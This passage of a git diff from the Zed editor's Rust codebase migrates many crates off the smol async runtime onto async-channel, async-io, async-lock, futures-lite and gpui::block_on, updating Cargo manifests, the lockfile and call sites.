crates/context_server/Cargo.toml | 5 +- crates/context_server/src/client.rs | 10 +- crates/context_server/src/listener.rs | 5 +- crates/context_server/src/oauth.rs | 36 +++--- crates/context_server/src/transport/http.rs | 112 +++++++++--------- .../src/transport/stdio_transport.rs | 21 ++-- crates/crashes/Cargo.toml | 2 +- crates/crashes/src/crashes.rs | 26 ++-- crates/db/Cargo.toml | 1 - crates/db/src/db.rs | 11 +- crates/db/src/kvp.rs | 2 +- 
crates/edit_prediction_cli/src/main.rs | 4 +- crates/editor/Cargo.toml | 2 +- crates/editor/src/display_map.rs | 2 +- crates/editor/src/display_map/wrap_map.rs | 9 +- crates/editor/src/hover_popover.rs | 2 +- crates/editor/src/lsp_ext.rs | 2 +- .../src/test/editor_lsp_test_context.rs | 2 +- crates/fs/Cargo.toml | 1 + crates/fs/src/fake_git_repo.rs | 7 +- crates/fs/src/fs.rs | 12 +- crates/fs/src/fs_watcher.rs | 4 +- crates/fs/tests/integration/fs.rs | 8 +- crates/git/Cargo.toml | 1 + crates/git/src/repository.rs | 8 +- crates/git_graph/Cargo.toml | 2 +- crates/git_graph/src/git_graph.rs | 2 +- crates/git_ui/Cargo.toml | 2 +- crates/git_ui/src/project_diff.rs | 2 +- crates/gpui/src/gpui.rs | 2 + crates/gpui/src/test.rs | 2 +- crates/gpui_wgpu/src/wgpu_atlas.rs | 2 +- crates/gpui_wgpu/src/wgpu_context.rs | 2 +- crates/language/Cargo.toml | 2 +- crates/language/src/buffer.rs | 2 +- crates/language/src/buffer_tests.rs | 3 +- crates/language/src/language.rs | 2 +- crates/language/src/language_registry.rs | 14 +-- crates/language_model_core/Cargo.toml | 2 +- .../language_model_core/src/rate_limiter.rs | 2 +- crates/language_models/Cargo.toml | 2 +- .../language_models/src/provider/bedrock.rs | 2 +- crates/language_models_cloud/Cargo.toml | 1 - .../src/language_models_cloud.rs | 4 +- crates/multi_buffer/Cargo.toml | 2 +- crates/multi_buffer/src/multi_buffer.rs | 2 +- crates/notifications/Cargo.toml | 2 +- .../notifications/src/notification_store.rs | 2 +- crates/outline/Cargo.toml | 2 +- crates/outline/src/outline.rs | 2 +- crates/outline_panel/Cargo.toml | 3 +- crates/outline_panel/src/outline_panel.rs | 9 +- crates/project/Cargo.toml | 1 + crates/project/src/buffer_store.rs | 6 +- crates/project/src/git_store.rs | 10 +- crates/project/src/lsp_store.rs | 10 +- crates/project/src/project.rs | 2 +- crates/project/src/project_search.rs | 2 +- crates/project/src/terminals.rs | 2 +- crates/recent_projects/Cargo.toml | 1 - crates/recent_projects/src/remote_servers.rs | 3 +- 
crates/remote_server/Cargo.toml | 1 + crates/remote_server/src/server.rs | 15 ++- crates/search/Cargo.toml | 2 +- crates/search/src/buffer_search.rs | 2 +- crates/search/src/project_search.rs | 2 +- crates/sidebar/Cargo.toml | 2 +- crates/sidebar/src/sidebar.rs | 8 +- crates/sqlez/Cargo.toml | 2 +- crates/sqlez/src/thread_safe_connection.rs | 2 +- crates/terminal/Cargo.toml | 3 +- crates/terminal/src/terminal.rs | 19 +-- crates/workspace/Cargo.toml | 1 + crates/workspace/src/workspace.rs | 3 +- crates/worktree/Cargo.toml | 2 +- crates/worktree/src/worktree.rs | 34 +++--- crates/zed/src/main.rs | 3 +- crates/zed/src/zed/visual_tests.rs | 10 +- 100 files changed, 358 insertions(+), 341 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 29bd35ca97de9b..0c029906834738 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -9,6 +9,7 @@ dependencies = [ "action_log", "agent-client-protocol", "anyhow", + "async-channel 2.5.0", "base64 0.22.1", "buffer_diff", "chrono", @@ -34,7 +35,6 @@ dependencies = [ "serde", "serde_json", "settings", - "smol", "task", "telemetry", "terminal", @@ -152,6 +152,8 @@ dependencies = [ "agent_servers", "agent_settings", "anyhow", + "async-channel 2.5.0", + "async-io", "chrono", "client", "clock", @@ -198,7 +200,6 @@ dependencies = [ "settings", "shell_command_parser", "smallvec", - "smol", "sqlez", "streaming_diff", "strsim", @@ -280,6 +281,7 @@ dependencies = [ "action_log", "agent-client-protocol", "anyhow", + "async-channel 2.5.0", "chrono", "client", "collections", @@ -303,7 +305,6 @@ dependencies = [ "serde", "serde_json", "settings", - "smol", "task", "tempfile", "terminal", @@ -351,6 +352,7 @@ dependencies = [ "agent_settings", "ai_onboarding", "anyhow", + "async-channel 2.5.0", "audio", "base64 0.22.1", "buffer_diff", @@ -419,7 +421,6 @@ dependencies = [ "serde_json", "serde_json_lenient", "settings", - "smol", "streaming_diff", "task", "telemetry", @@ -935,7 +936,7 @@ version = "2.2.0" source = 
"registry+https://github.com/rust-lang/crates.io-index" checksum = "8034a681df4aed8b8edbd7fbe472401ecf009251c8b40556b304567052e294c5" dependencies = [ - "async-lock 3.4.2", + "async-lock", "blocking", "futures-lite 2.6.1", ] @@ -949,7 +950,7 @@ dependencies = [ "async-channel 2.5.0", "async-executor", "async-io", - "async-lock 3.4.2", + "async-lock", "blocking", "futures-lite 2.6.1", "once_cell", @@ -973,15 +974,6 @@ dependencies = [ "windows-sys 0.61.2", ] -[[package]] -name = "async-lock" -version = "2.8.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "287272293e9d8c41773cec55e365490fe034813a2f172f502d6ddcf75b2f582b" -dependencies = [ - "event-listener 2.5.3", -] - [[package]] name = "async-lock" version = "3.4.2" @@ -1021,7 +1013,7 @@ checksum = "fc50921ec0055cdd8a16de48773bfeec5c972598674347252c0399676be7da75" dependencies = [ "async-channel 2.5.0", "async-io", - "async-lock 3.4.2", + "async-lock", "async-signal", "async-task", "blocking", @@ -1049,7 +1041,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "43c070bbf59cd3570b6b2dd54cd772527c7c3620fce8be898406dd3ed6adc64c" dependencies = [ "async-io", - "async-lock 3.4.2", + "async-lock", "atomic-waker", "cfg-if", "futures-core", @@ -1070,7 +1062,7 @@ dependencies = [ "async-channel 1.9.0", "async-global-executor", "async-io", - "async-lock 3.4.2", + "async-lock", "async-process", "crossbeam-utils", "futures-channel", @@ -2962,6 +2954,7 @@ name = "client" version = "0.1.0" dependencies = [ "anyhow", + "async-channel 2.5.0", "async-tungstenite", "base64 0.22.1", "chrono", @@ -3029,6 +3022,7 @@ name = "cloud_api_client" version = "0.1.0" dependencies = [ "anyhow", + "async-lock", "cloud_api_types", "futures 0.3.32", "gpui", @@ -3036,7 +3030,6 @@ dependencies = [ "http_client", "parking_lot", "serde_json", - "smol", "thiserror 2.0.17", "yawc", ] @@ -3183,6 +3176,7 @@ version = "0.44.0" dependencies = [ "agent", "anyhow", + "async-channel 2.5.0", 
"async-trait", "async-tungstenite", "aws-config", @@ -3560,15 +3554,19 @@ name = "context_server" version = "0.1.0" dependencies = [ "anyhow", + "async-channel 2.5.0", + "async-process", "async-trait", "base64 0.22.1", "collections", "futures 0.3.32", + "futures-lite 1.13.0", "gpui", "http_client", "log", "net", "parking_lot", + "pollster 0.4.0", "postage", "rand 0.9.3", "schemars 1.0.4", @@ -3577,7 +3575,6 @@ dependencies = [ "settings", "sha2", "slotmap", - "smol", "tempfile", "tiny_http", "url", @@ -4114,6 +4111,7 @@ dependencies = [ name = "crashes" version = "0.1.0" dependencies = [ + "async-process", "cfg-if", "crash-handler", "futures 0.3.32", @@ -4125,7 +4123,6 @@ dependencies = [ "release_channel", "serde", "serde_json", - "smol", "system_specs", "windows 0.61.3", "zstd", @@ -4657,7 +4654,6 @@ dependencies = [ "log", "paths", "release_channel", - "smol", "sqlez", "sqlez_macros", "tempfile", @@ -5476,6 +5472,7 @@ dependencies = [ "file_icons", "fs", "futures 0.3.32", + "futures-lite 1.13.0", "fuzzy", "git", "gpui", @@ -5506,7 +5503,6 @@ dependencies = [ "serde_json", "settings", "smallvec", - "smol", "snippet", "sum_tree", "task", @@ -6590,6 +6586,7 @@ version = "0.1.0" dependencies = [ "anyhow", "ashpd", + "async-channel 2.5.0", "async-tar", "async-trait", "collections", @@ -7267,6 +7264,7 @@ version = "0.1.0" dependencies = [ "anyhow", "askpass", + "async-channel 2.5.0", "async-trait", "collections", "derive_more", @@ -7316,6 +7314,7 @@ name = "git_graph" version = "0.1.0" dependencies = [ "anyhow", + "async-channel 2.5.0", "collections", "db", "editor", @@ -7334,7 +7333,6 @@ dependencies = [ "serde_json", "settings", "smallvec", - "smol", "theme", "theme_settings", "time", @@ -7382,6 +7380,7 @@ dependencies = [ "file_icons", "fs", "futures 0.3.32", + "futures-lite 1.13.0", "fuzzy", "fuzzy_nucleo", "git", @@ -7410,7 +7409,6 @@ dependencies = [ "serde_json", "settings", "smallvec", - "smol", "strum 0.27.2", "task", "telemetry", @@ -9475,6 +9473,7 @@ 
dependencies = [ "encoding_rs", "fs", "futures 0.3.32", + "futures-lite 1.13.0", "fuzzy", "globset", "gpui", @@ -9497,7 +9496,6 @@ dependencies = [ "settings", "shellexpand", "smallvec", - "smol", "streaming-iterator", "strsim", "sum_tree", @@ -9595,6 +9593,7 @@ name = "language_model_core" version = "0.1.0" dependencies = [ "anyhow", + "async-lock", "cloud_llm_client", "futures 0.3.32", "gpui_shared_string", @@ -9603,7 +9602,6 @@ dependencies = [ "schemars 1.0.4", "serde", "serde_json", - "smol", "strum 0.27.2", "thiserror 2.0.17", ] @@ -9615,6 +9613,7 @@ dependencies = [ "ai_onboarding", "anthropic", "anyhow", + "async-lock", "aws-config", "aws-credential-types", "aws_http_client", @@ -9656,7 +9655,6 @@ dependencies = [ "serde", "serde_json", "settings", - "smol", "strum 0.27.2", "tokio", "ui", @@ -9683,7 +9681,6 @@ dependencies = [ "semver", "serde", "serde_json", - "smol", "thiserror 2.0.17", ] @@ -10912,6 +10909,7 @@ dependencies = [ "clock", "collections", "ctor", + "futures-lite 1.13.0", "gpui", "indoc", "itertools 0.14.0", @@ -10924,7 +10922,6 @@ dependencies = [ "serde", "settings", "smallvec", - "smol", "sum_tree", "text", "theme", @@ -11198,7 +11195,7 @@ dependencies = [ "channel", "client", "component", - "db", + "futures-lite 1.13.0", "gpui", "rpc", "sum_tree", @@ -11792,7 +11789,7 @@ dependencies = [ "ashpd", "async-fs", "async-io", - "async-lock 3.4.2", + "async-lock", "blocking", "cbc", "cipher", @@ -12035,6 +12032,7 @@ name = "outline" version = "0.1.0" dependencies = [ "editor", + "futures 0.3.32", "fuzzy", "gpui", "indoc", @@ -12047,7 +12045,6 @@ dependencies = [ "rope", "serde_json", "settings", - "smol", "theme", "theme_settings", "ui", @@ -12061,10 +12058,12 @@ name = "outline_panel" version = "0.1.0" dependencies = [ "anyhow", + "async-channel 2.5.0", "collections", "db", "editor", "file_icons", + "futures 0.3.32", "fuzzy", "gpui", "itertools 0.14.0", @@ -12080,7 +12079,6 @@ dependencies = [ "serde_json", "settings", "smallvec", - "smol", 
"theme", "theme_settings", "ui", @@ -13440,6 +13438,7 @@ dependencies = [ "aho-corasick", "anyhow", "askpass", + "async-channel 2.5.0", "async-trait", "base64 0.22.1", "buffer_diff", @@ -14404,7 +14403,6 @@ dependencies = [ "serde", "serde_json", "settings", - "smol", "task", "telemetry", "ui", @@ -14606,6 +14604,7 @@ dependencies = [ "agent", "anyhow", "askpass", + "async-channel 2.5.0", "cargo_toml", "clap", "client", @@ -15744,6 +15743,7 @@ dependencies = [ "editor", "fs", "futures 0.3.32", + "futures-lite 1.13.0", "gpui", "itertools 0.14.0", "language", @@ -15755,7 +15755,6 @@ dependencies = [ "serde", "serde_json", "settings", - "smol", "theme", "theme_settings", "tracing", @@ -16304,6 +16303,7 @@ dependencies = [ "agent_settings", "agent_ui", "anyhow", + "async-channel 2.5.0", "chrono", "client", "clock", @@ -16333,7 +16333,6 @@ dependencies = [ "serde", "serde_json", "settings", - "smol", "telemetry", "theme", "theme_settings", @@ -16518,7 +16517,7 @@ dependencies = [ "async-executor", "async-fs", "async-io", - "async-lock 3.4.2", + "async-lock", "async-net", "async-process", "blocking", @@ -16689,7 +16688,7 @@ dependencies = [ "libsqlite3-sys", "log", "parking_lot", - "smol", + "pollster 0.4.0", "sqlformat", "thread_local", "util", @@ -17773,8 +17772,10 @@ version = "0.1.0" dependencies = [ "alacritty_terminal", "anyhow", + "async-channel 2.5.0", "collections", "futures 0.3.32", + "futures-lite 1.13.0", "gpui", "itertools 0.14.0", "libc", @@ -17787,7 +17788,6 @@ dependencies = [ "schemars 1.0.4", "serde", "settings", - "smol", "sysinfo 0.37.2", "task", "theme", @@ -21929,6 +21929,7 @@ dependencies = [ "db", "fs", "futures 0.3.32", + "futures-lite 1.13.0", "git", "gpui", "http_client", @@ -21971,7 +21972,8 @@ name = "worktree" version = "0.1.0" dependencies = [ "anyhow", - "async-lock 2.8.0", + "async-channel 2.5.0", + "async-lock", "chardetng", "clock", "collections", @@ -21994,7 +21996,6 @@ dependencies = [ "serde_json", "settings", "smallvec", - "smol", 
"sum_tree", "text", "tracing", @@ -22331,7 +22332,7 @@ dependencies = [ "async-broadcast", "async-executor", "async-io", - "async-lock 3.4.2", + "async-lock", "async-process", "async-recursion", "async-task", diff --git a/Cargo.toml b/Cargo.toml index b8462617ab367b..69d2a5c2f59ecc 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -515,13 +515,15 @@ async-compat = "0.2.1" async-compression = { version = "0.4", features = ["bzip2", "gzip", "futures-io"] } async-dispatcher = "0.1" async-fs = "2.1" -async-lock = "2.1" +async-io = "2.6.0" +async-lock = "3.4.2" async-pipe = { git = "https://github.com/zed-industries/async-pipe-rs", rev = "82d00a04211cf4e1236029aa03e6b6ce2a74c553" } async-recursion = "1.0.0" async-tar = "0.5.1" async-task = "4.7" async-trait = "0.1" async-tungstenite = "0.31.0" +async-process = "2.5.0" async_zip = { version = "0.0.18", features = ["deflate", "deflate64"] } aws-config = { version = "1.8.10", features = ["behavior-version-latest"] } aws-credential-types = { version = "1.2.8", features = [ diff --git a/crates/acp_thread/Cargo.toml b/crates/acp_thread/Cargo.toml index 56ead8ada6ca82..987db1dcf8e654 100644 --- a/crates/acp_thread/Cargo.toml +++ b/crates/acp_thread/Cargo.toml @@ -18,6 +18,7 @@ test-support = ["gpui/test-support", "project/test-support", "dep:parking_lot", [dependencies] action_log.workspace = true agent-client-protocol.workspace = true +async-channel.workspace = true base64.workspace = true anyhow.workspace = true buffer_diff.workspace = true @@ -41,7 +42,6 @@ prompt_store.workspace = true serde.workspace = true serde_json.workspace = true settings.workspace = true -smol.workspace = true task.workspace = true telemetry.workspace = true terminal.workspace = true diff --git a/crates/acp_thread/src/acp_thread.rs b/crates/acp_thread/src/acp_thread.rs index 61bee3ff85d066..42c6af38362fb1 100644 --- a/crates/acp_thread/src/acp_thread.rs +++ b/crates/acp_thread/src/acp_thread.rs @@ -3047,6 +3047,7 @@ fn markdown_for_raw_output( mod tests { 
use super::*; use anyhow::anyhow; + use futures::stream::StreamExt as _; use futures::{channel::mpsc, future::LocalBoxFuture, select}; use gpui::{App, AsyncApp, TestAppContext, WeakEntity}; use indoc::indoc; @@ -3054,7 +3055,6 @@ mod tests { use rand::{distr, prelude::*}; use serde_json::json; use settings::SettingsStore; - use smol::stream::StreamExt as _; use std::{ any::Any, cell::RefCell, @@ -3259,7 +3259,7 @@ mod tests { // Create a real PTY terminal that runs a command which prints output then sleeps // We use printf instead of echo and chain with && sleep to ensure proper execution - let (completion_tx, _completion_rx) = smol::channel::unbounded(); + let (completion_tx, _completion_rx) = async_channel::unbounded(); let (program, args) = ShellBuilder::new(&Shell::System, false).build( Some("printf 'output_before_kill\\n' && sleep 60".to_owned()), &[], diff --git a/crates/acp_thread/src/connection.rs b/crates/acp_thread/src/connection.rs index 4bbf13bdb5ddcf..bbb967530e3a5f 100644 --- a/crates/acp_thread/src/connection.rs +++ b/crates/acp_thread/src/connection.rs @@ -318,7 +318,7 @@ pub trait AgentSessionList { Task::ready(Err(anyhow::anyhow!("delete_sessions not supported"))) } - fn watch(&self, _cx: &mut App) -> Option> { + fn watch(&self, _cx: &mut App) -> Option> { None } diff --git a/crates/agent/Cargo.toml b/crates/agent/Cargo.toml index a5a4c2742a444b..ce472fd9e36ee9 100644 --- a/crates/agent/Cargo.toml +++ b/crates/agent/Cargo.toml @@ -19,6 +19,7 @@ workspace = true [dependencies] acp_thread.workspace = true action_log.workspace = true +async-channel.workspace = true agent-client-protocol.workspace = true agent_servers.workspace = true agent_settings.workspace = true @@ -59,7 +60,6 @@ serde_json.workspace = true settings.workspace = true shell_command_parser.workspace = true smallvec.workspace = true -smol.workspace = true sqlez.workspace = true streaming_diff.workspace = true strsim.workspace = true @@ -77,6 +77,7 @@ zed_env_vars.workspace = true 
zstd.workspace = true [dev-dependencies] +async-io.workspace = true agent_servers = { workspace = true, "features" = ["test-support"] } client = { workspace = true, "features" = ["test-support"] } clock = { workspace = true, "features" = ["test-support"] } diff --git a/crates/agent/src/agent.rs b/crates/agent/src/agent.rs index c5bc4c582852b0..45da8c92169a29 100644 --- a/crates/agent/src/agent.rs +++ b/crates/agent/src/agent.rs @@ -1743,14 +1743,14 @@ impl acp_thread::AgentTelemetry for NativeAgentConnection { pub struct NativeAgentSessionList { thread_store: Entity, - updates_tx: smol::channel::Sender, - updates_rx: smol::channel::Receiver, + updates_tx: async_channel::Sender, + updates_rx: async_channel::Receiver, _subscription: Subscription, } impl NativeAgentSessionList { fn new(thread_store: Entity, cx: &mut App) -> Self { - let (tx, rx) = smol::channel::unbounded(); + let (tx, rx) = async_channel::unbounded(); let this_tx = tx.clone(); let subscription = cx.observe(&thread_store, move |_, _| { this_tx @@ -1802,7 +1802,7 @@ impl AgentSessionList for NativeAgentSessionList { fn watch( &self, _cx: &mut App, - ) -> Option> { + ) -> Option> { Some(self.updates_rx.clone()) } diff --git a/crates/agent/src/edit_agent/evals.rs b/crates/agent/src/edit_agent/evals.rs index ba8b7ed867ea26..c1c2886f84e0aa 100644 --- a/crates/agent/src/edit_agent/evals.rs +++ b/crates/agent/src/edit_agent/evals.rs @@ -1670,7 +1670,7 @@ async fn retry_on_rate_limit(mut request: impl AsyncFnMut() -> Result) -> eprintln!("Attempt #{attempt}: Retry after {retry_after:?} + jitter of {jitter:?}"); // This code does not use the gpui::executor #[allow(clippy::disallowed_methods)] - smol::Timer::after(retry_after + jitter).await; + async_io::Timer::after(retry_after + jitter).await; } else { return response; } diff --git a/crates/agent/src/tools/evals/streaming_edit_file.rs b/crates/agent/src/tools/evals/streaming_edit_file.rs index 0c6290ec098f9c..3156fd253978bc 100644 --- 
a/crates/agent/src/tools/evals/streaming_edit_file.rs +++ b/crates/agent/src/tools/evals/streaming_edit_file.rs @@ -729,7 +729,7 @@ async fn retry_on_rate_limit(mut request: impl AsyncFnMut() -> Result) -> let jitter = retry_after.mul_f64(rand::rng().random_range(0.0..1.0)); eprintln!("Attempt #{attempt}: Retry after {retry_after:?} + jitter of {jitter:?}"); #[allow(clippy::disallowed_methods)] - smol::Timer::after(retry_after + jitter).await; + async_io::Timer::after(retry_after + jitter).await; } else { return response; } diff --git a/crates/agent_servers/Cargo.toml b/crates/agent_servers/Cargo.toml index c8970ec57a9050..1a12a5415731b4 100644 --- a/crates/agent_servers/Cargo.toml +++ b/crates/agent_servers/Cargo.toml @@ -20,6 +20,7 @@ doctest = false acp_tools.workspace = true acp_thread.workspace = true action_log.workspace = true +async-channel.workspace = true agent-client-protocol.workspace = true anyhow.workspace = true chrono.workspace = true @@ -43,7 +44,6 @@ reqwest_client = { workspace = true, optional = true } serde.workspace = true serde_json.workspace = true settings.workspace = true -smol.workspace = true task.workspace = true tempfile.workspace = true thiserror.workspace = true diff --git a/crates/agent_servers/src/acp.rs b/crates/agent_servers/src/acp.rs index 28ec60e404314a..57ca7ddeac7a77 100644 --- a/crates/agent_servers/src/acp.rs +++ b/crates/agent_servers/src/acp.rs @@ -286,13 +286,13 @@ pub struct AcpSession { pub struct AcpSessionList { connection: ConnectionTo, - updates_tx: smol::channel::Sender, - updates_rx: smol::channel::Receiver, + updates_tx: async_channel::Sender, + updates_rx: async_channel::Receiver, } impl AcpSessionList { fn new(connection: ConnectionTo) -> Self { - let (tx, rx) = smol::channel::unbounded(); + let (tx, rx) = async_channel::unbounded(); Self { connection, updates_tx: tx, @@ -353,7 +353,7 @@ impl AgentSessionList for AcpSessionList { fn watch( &self, _cx: &mut App, - ) -> Option> { + ) -> Option> { 
Some(self.updates_rx.clone()) } @@ -1654,7 +1654,7 @@ pub mod test_support { close_session_count: Arc, fail_next_prompt: Arc, exit_status_sender: - Arc>>>, + Arc>>>, } impl FakeAcpAgentServer { @@ -1715,7 +1715,7 @@ pub mod test_support { cx, ) .await?; - let (exit_tx, exit_rx) = smol::channel::bounded(1); + let (exit_tx, exit_rx) = async_channel::bounded(1); *exit_status_sender .lock() .expect("exit status sender lock should not be poisoned") = Some(exit_tx); @@ -2224,7 +2224,7 @@ mod tests { Arc, Arc, Arc>>, - Arc>>>, + Arc>>>, Task>, ) { cx.update(|cx| { @@ -2240,7 +2240,7 @@ mod tests { let close_count = Arc::new(AtomicUsize::new(0)); let load_session_updates: Arc>> = Arc::new(std::sync::Mutex::new(Vec::new())); - let load_session_gate: Arc>>> = + let load_session_gate: Arc>>> = Arc::new(std::sync::Mutex::new(None)); let (client_transport, agent_transport) = agent_client_protocol::Channel::duplex(); @@ -2595,7 +2595,7 @@ mod tests { // Install a gate so the fake agent's `load_session` handler parks // before sending its response. We'll close the session while the // load is parked. 
- let (gate_tx, gate_rx) = smol::channel::bounded::<()>(1); + let (gate_tx, gate_rx) = async_channel::bounded::<()>(1); *load_session_gate .lock() .expect("load_session_gate mutex poisoned") = Some(gate_rx); @@ -2690,7 +2690,7 @@ mod tests { _keep_agent_alive, ) = connect_fake_agent(cx).await; - let (gate_tx, gate_rx) = smol::channel::bounded::<()>(1); + let (gate_tx, gate_rx) = async_channel::bounded::<()>(1); *load_session_gate .lock() .expect("load_session_gate mutex poisoned") = Some(gate_rx); diff --git a/crates/agent_ui/Cargo.toml b/crates/agent_ui/Cargo.toml index 65be660ed07a78..5f5a7cc7926ff5 100644 --- a/crates/agent_ui/Cargo.toml +++ b/crates/agent_ui/Cargo.toml @@ -30,6 +30,7 @@ acp_thread.workspace = true action_log.workspace = true agent-client-protocol.workspace = true agent.workspace = true +async-channel.workspace = true agent_servers.workspace = true agent_settings.workspace = true ai_onboarding.workspace = true @@ -93,7 +94,6 @@ serde.workspace = true serde_json.workspace = true serde_json_lenient.workspace = true settings.workspace = true -smol.workspace = true streaming_diff.workspace = true task.workspace = true telemetry.workspace = true diff --git a/crates/agent_ui/src/buffer_codegen.rs b/crates/agent_ui/src/buffer_codegen.rs index d5288c564d7211..8be5aa52bc6862 100644 --- a/crates/agent_ui/src/buffer_codegen.rs +++ b/crates/agent_ui/src/buffer_codegen.rs @@ -3,6 +3,7 @@ use agent_settings::AgentSettings; use anyhow::{Context as _, Result}; use collections::HashSet; use editor::{Anchor, AnchorRangeExt, MultiBuffer, MultiBufferSnapshot, ToOffset as _, ToPoint}; +use futures::FutureExt; use futures::{ SinkExt, Stream, StreamExt, TryStreamExt as _, channel::mpsc, @@ -28,7 +29,6 @@ use rope::Rope; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; use settings::Settings as _; -use smol::future::FutureExt; use std::{ cmp, future::Future, diff --git a/crates/agent_ui/src/inline_assistant.rs b/crates/agent_ui/src/inline_assistant.rs 
index 71aa7baf7816b3..d94e0d8782bc54 100644 --- a/crates/agent_ui/src/inline_assistant.rs +++ b/crates/agent_ui/src/inline_assistant.rs @@ -1849,12 +1849,12 @@ pub mod evals { use eval_utils::{EvalOutput, NoProcessor}; use fs::FakeFs; use futures::channel::mpsc; + use futures::stream::StreamExt as _; use gpui::{AppContext, TestAppContext, UpdateGlobal as _}; use language::Buffer; use language_model::{LanguageModelRegistry, SelectedModel}; use project::Project; use prompt_store::PromptBuilder; - use smol::stream::StreamExt as _; use std::str::FromStr; use std::sync::Arc; use util::test::marked_text_ranges; diff --git a/crates/agent_ui/src/thread_metadata_store.rs b/crates/agent_ui/src/thread_metadata_store.rs index f7ba017c164cd6..ff6eb3b98ec67d 100644 --- a/crates/agent_ui/src/thread_metadata_store.rs +++ b/crates/agent_ui/src/thread_metadata_store.rs @@ -469,8 +469,8 @@ pub struct ThreadMetadataStore { threads_by_session: HashMap, reload_task: Option>>, conversation_subscriptions: HashMap, - pending_thread_ops_tx: smol::channel::Sender, - in_flight_archives: HashMap, smol::channel::Sender<()>)>, + pending_thread_ops_tx: async_channel::Sender, + in_flight_archives: HashMap, async_channel::Sender<()>)>, _db_operations_task: Task<()>, } @@ -526,7 +526,7 @@ impl ThreadMetadataStore { #[cfg(any(test, feature = "test-support"))] pub fn init_global(cx: &mut App) { let db_name = TestMetadataDbName::global(cx); - let db = smol::block_on(db::open_test_db::(&db_name)); + let db = gpui::block_on(db::open_test_db::(&db_name)); let thread_store = cx.new(|cx| Self::new(ThreadMetadataDb(db), cx)); cx.set_global(GlobalThreadMetadataStore(thread_store)); } @@ -786,7 +786,7 @@ impl ThreadMetadataStore { pub fn archive( &mut self, thread_id: ThreadId, - archive_job: Option<(Task<()>, smol::channel::Sender<()>)>, + archive_job: Option<(Task<()>, async_channel::Sender<()>)>, cx: &mut Context, ) { self.update_archived(thread_id, true, cx); @@ -1109,7 +1109,7 @@ impl ThreadMetadataStore 
{ }) .detach(); - let (tx, rx) = smol::channel::unbounded(); + let (tx, rx) = async_channel::unbounded(); let _db_operations_task = cx.background_spawn({ let db = db.clone(); async move { @@ -1787,7 +1787,7 @@ mod tests { fn clear_thread_metadata_remote_connection_backfill(cx: &mut TestAppContext) { let kvp = cx.update(|cx| KeyValueStore::global(cx)); - smol::block_on(kvp.delete_kvp("thread-metadata-remote-connection-backfill".to_string())) + gpui::block_on(kvp.delete_kvp("thread-metadata-remote-connection-backfill".to_string())) .unwrap(); } @@ -1810,7 +1810,7 @@ mod tests { let thread = std::thread::current(); let test_name = thread.name().unwrap_or("unknown_test"); let db_name = format!("THREAD_METADATA_DB_{}", test_name); - let db = ThreadMetadataDb(smol::block_on(db::open_test_db::( + let db = ThreadMetadataDb(gpui::block_on(db::open_test_db::( &db_name, ))); diff --git a/crates/agent_ui/src/threads_archive_view.rs b/crates/agent_ui/src/threads_archive_view.rs index 6204552fe6c614..e6e9ca4f5f5c09 100644 --- a/crates/agent_ui/src/threads_archive_view.rs +++ b/crates/agent_ui/src/threads_archive_view.rs @@ -1335,7 +1335,7 @@ impl PickerDelegate for ProjectPickerDelegate { }) .collect(); - let mut sibling_matches = smol::block_on(fuzzy::match_strings( + let mut sibling_matches = gpui::block_on(fuzzy::match_strings( &sibling_candidates, query, smart_case, @@ -1369,7 +1369,7 @@ impl PickerDelegate for ProjectPickerDelegate { }) .collect(); - let mut recent_matches = smol::block_on(fuzzy::match_strings( + let mut recent_matches = gpui::block_on(fuzzy::match_strings( &recent_candidates, query, smart_case, diff --git a/crates/client/Cargo.toml b/crates/client/Cargo.toml index 532fe38f7df1f6..0a3c49d1237823 100644 --- a/crates/client/Cargo.toml +++ b/crates/client/Cargo.toml @@ -17,6 +17,7 @@ test-support = ["clock/test-support", "collections/test-support", "gpui/test-sup [dependencies] anyhow.workspace = true +async-channel.workspace = true async-tungstenite = { 
workspace = true, features = ["tokio", "tokio-rustls-manual-roots"] } base64.workspace = true chrono = { workspace = true, features = ["serde"] } diff --git a/crates/client/src/client.rs b/crates/client/src/client.rs index 6e18f18318fa81..95f57a6279727c 100644 --- a/crates/client/src/client.rs +++ b/crates/client/src/client.rs @@ -2181,8 +2181,8 @@ mod tests { }); let server = FakeServer::for_client(user_id, &client, cx).await; - let (done_tx1, done_rx1) = smol::channel::unbounded(); - let (done_tx2, done_rx2) = smol::channel::unbounded(); + let (done_tx1, done_rx1) = async_channel::unbounded(); + let (done_tx2, done_rx2) = async_channel::unbounded(); AnyProtoClient::from(client.clone()).add_entity_message_handler( move |entity: Entity, _: TypedEnvelope, cx| { match entity.read_with(&cx, |entity, _| entity.id) { @@ -2252,8 +2252,8 @@ mod tests { let server = FakeServer::for_client(user_id, &client, cx).await; let entity = cx.new(|_| TestEntity::default()); - let (done_tx1, _done_rx1) = smol::channel::unbounded(); - let (done_tx2, done_rx2) = smol::channel::unbounded(); + let (done_tx1, _done_rx1) = async_channel::unbounded(); + let (done_tx2, done_rx2) = async_channel::unbounded(); let subscription1 = client.add_message_handler( entity.downgrade(), move |_, _: TypedEnvelope, _| { @@ -2287,7 +2287,7 @@ mod tests { let server = FakeServer::for_client(user_id, &client, cx).await; let entity = cx.new(|_| TestEntity::default()); - let (done_tx, done_rx) = smol::channel::unbounded(); + let (done_tx, done_rx) = async_channel::unbounded(); let subscription = client.add_message_handler( entity.clone().downgrade(), move |entity: Entity, _: TypedEnvelope, mut cx| { diff --git a/crates/cloud_api_client/Cargo.toml b/crates/cloud_api_client/Cargo.toml index cf293d83f848e1..716276ccf44a37 100644 --- a/crates/cloud_api_client/Cargo.toml +++ b/crates/cloud_api_client/Cargo.toml @@ -20,6 +20,6 @@ gpui_tokio.workspace = true http_client.workspace = true parking_lot.workspace = true 
